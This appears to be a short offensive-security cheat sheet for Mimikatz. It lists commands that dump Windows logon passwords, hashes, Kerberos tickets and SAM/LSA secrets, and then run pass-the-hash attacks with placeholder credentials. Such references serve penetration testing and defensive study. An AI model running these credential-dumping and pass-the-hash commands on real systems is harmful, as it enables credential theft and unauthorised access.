Mimikatz ¶

mimikatz (18.4k ⭐) is the most popular tool to dump Windows credentials or perform attacks such as Pass-the-hash/Pass-the-ticket.

PS> .\mimikatz.exe
mimikatz# privilege::debug
mimikatz# # run commands
mimikatz# exit

To dump credentials, hashes, tickets, etc. you can use:

mimikatz# sekurlsa::logonPasswords full
mimikatz# sekurlsa::ekeys           # dump rc4+ntlm hashes
mimikatz# sekurlsa::tickets /export # dump tickets
mimikatz# lsadump:: # show the list of modules
mimikatz# lsadump::sam
mimikatz# lsadump::lsa

To perform a pass-the-hash attack using a rc4 or NTML hash:

mimikatz# sekurlsa::pth /user:xxx /rc4:XXX /domain:xxx.yyy
mimikatz# sekurlsa::pth /user:xxx /rc4:XXX /domain:xxx.yyy /run:cmd.exe
mimikatz# sekurlsa::pth /user:xxx /ntlm:XXX /domain:xxx.yyy /run:cmd.exe